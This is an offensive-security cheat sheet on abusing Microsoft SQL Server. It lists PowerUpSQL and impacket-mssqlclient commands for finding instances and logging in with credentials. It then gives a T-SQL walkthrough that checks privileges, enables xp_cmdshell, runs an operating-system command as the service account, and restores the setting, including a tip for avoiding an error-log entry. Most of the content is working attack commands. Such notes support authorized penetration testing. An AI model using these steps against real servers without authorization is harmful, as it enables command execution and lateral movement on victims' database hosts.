
MSSQL Abuse

Identify


https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet

Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain
Connect - Windows
Get-SQLQuery -Verbose -Instance "host,port" -Username "domain.local\user" -Password "password" -Query 'SELECT @@version'
(PowerShell does not treat backslash as an escape, so the domain login is written with a single backslash; leave out -Username/-Password and PowerUpSQL authenticates with the current Windows token instead.)
Connect - Linux
impacket-mssqlclient domain.local/user:'pass'@<IP> -windows-auth

Exploit


Run commands with xp_cmdshell

Requires a login that can change server configuration (sysadmin, or ALTER SETTINGS); the command runs as the SQL Server service account. enable_xp_cmdshell is an mssqlclient built-in that issues the sp_configure / RECONFIGURE calls for you.

SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami /priv
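The same procedure as raw T-SQL, added here as an example rather than taken from the original page or from impacket: it is what enable_xp_cmdshell does under the hood, so it works from any client (sqlcmd, PowerUpSQL's Get-SQLQuery, or an injection point that allows stacked queries). The two SELECTs in front are the checks a tester wants before touching configuration; the column aliases are mine.

```sql
-- Added example (not from the original page): enabling and using xp_cmdshell
-- by hand, with pre-flight checks.

-- 1. Who am I, and can I change server configuration? sp_configure needs
--    ALTER SETTINGS, which the sysadmin and serveradmin roles hold.
SELECT SYSTEM_USER                     AS login_name,
       IS_SRVROLEMEMBER('sysadmin')    AS is_sysadmin,
       IS_SRVROLEMEMBER('serveradmin') AS is_serveradmin;

-- 2. Is xp_cmdshell already on? value_in_use = 1 means no RECONFIGURE is
--    needed, so you avoid writing a config-change entry to the error log.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name IN ('show advanced options', 'xp_cmdshell');

-- 3. Enable it. 'show advanced options' has to be on before sp_configure
--    will accept 'xp_cmdshell'; RECONFIGURE applies each change.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 4. Run the command. Each line of stdout/stderr comes back as one row.
EXEC master..xp_cmdshell 'whoami /priv';

-- 5. Put the setting back when done (only if step 2 showed it was off).
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

If step 1 shows a non-sysadmin login, enabling the option will fail, and even where xp_cmdshell is already on, a non-sysadmin caller only gets execution through the ##xp_cmdshell_proxy_account## proxy credential if one has been configured.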